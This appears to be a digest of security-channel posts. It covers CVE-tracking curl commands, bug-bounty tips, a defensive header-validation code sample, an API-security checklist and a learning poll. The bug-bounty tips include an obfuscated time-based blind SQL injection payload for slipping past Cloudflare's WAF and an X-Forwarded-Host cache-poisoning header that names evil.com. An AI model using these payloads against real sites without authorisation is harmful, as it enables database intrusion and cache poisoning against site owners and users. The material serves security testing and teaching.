How I track the latest CVEs — top 20, fast 🔥
curl -s 'https://cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https://cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
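The first/last split described above, as an added example (not code from the original post): a lenient CDN-style check that validates only the first value, a backend that trusts the last, and a strict validator that refuses a multi-valued or scheme-bearing header instead of picking one side. The allowlist entry legit.com is a constructed assumption.

```python
# Added example, not from the original post: shows why "CDN reads first,
# app reads last" lets an allowlist check pass while the backend still
# receives the attacker-chosen host, and a strict check that closes it.
from typing import List, Optional
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"legit.com"}  # constructed allowlist for the demo


def _values(header: str) -> List[str]:
    """Split a comma-joined header the way many proxies merge it."""
    return [v.strip() for v in header.split(",") if v.strip()]


def _host_only(value: str) -> str:
    """Tolerant normalisation: strip a scheme if one was sent."""
    if "://" in value:
        return urlsplit(value).netloc.lower()
    return value.lower()


def cdn_view(header: str) -> str:
    """Lenient CDN-style parse: only the first value is considered."""
    return _host_only(_values(header)[0])


def app_view(header: str) -> str:
    """Backend that takes the last value (the discrepancy the tip relies on)."""
    return _host_only(_values(header)[-1])


def cdn_allows(header: str) -> bool:
    """The CDN allowlist check as the tip describes it: first value only."""
    return cdn_view(header) in ALLOWED_HOSTS


def strict_forwarded_host(header: str) -> Optional[str]:
    """Hardened check: exactly one value, bare hostname, on the allowlist."""
    vals = _values(header)
    if len(vals) != 1:
        return None  # multi-valued header: refuse rather than pick a side
    v = vals[0].lower()
    if "://" in v or "/" in v or " " in v:
        return None  # a host header never carries a scheme or a path
    return v if v in ALLOWED_HOSTS else None
```

Logging the rejected raw header value at the strict check gives a cheap detection signal for this technique.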
🔐 *How to Secure Your APIs – A Practical Guide*
APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
🕵️♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
Check out today's sandwich 🙌🏻
Video
https://www.youtube.com/watch?v=H8CQ7XrCCdg
Blog
https://hacklido.com/blog/1366-the-invisible-virus-understanding-oauth-worms
How do you prefer to learn? (Anonymous Poll)
13% Reading textbooks or blogs
21% Watching videos
66% Hands-on practice